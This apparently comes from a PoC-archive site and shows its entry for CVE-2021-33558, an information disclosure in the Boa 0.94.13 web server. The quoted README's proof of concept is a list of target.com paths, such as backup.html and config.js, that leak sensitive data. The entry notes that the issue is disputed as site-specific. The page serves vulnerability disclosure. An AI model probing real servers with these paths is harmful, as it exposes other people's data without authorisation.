Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%

CVE-2021-33558 PoC — Boa 信息泄露漏洞

Source
Associated Vulnerability
Title:Boa 信息泄露漏洞 (CVE-2021-33558)
Description:Boa 0.94.13 allows remote attackers to obtain sensitive information via a misconfiguration involving backup.html, preview.html, js/log.js, log.html, email.html, online-users.html, and config.js. NOTE: multiple third parties report that this is a site-specific issue because those files are not part of Boa.
Readme
# CVE : CVE-2021-33558.
 Exploit code of CVE-2021-33558
 
# Summary

In Boa/0.94.13 there is various misconfiguration.it expose various senstive information.


# Proof of Concept

>> https://target.com/backup.html

>> https://target.com/preview.html

>> https://target.com/js/log.js

>> https://target.com/log.html

>> https://target.com/email.html

>> https://target.com/online-users.html

>> https://target.com/config.js
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →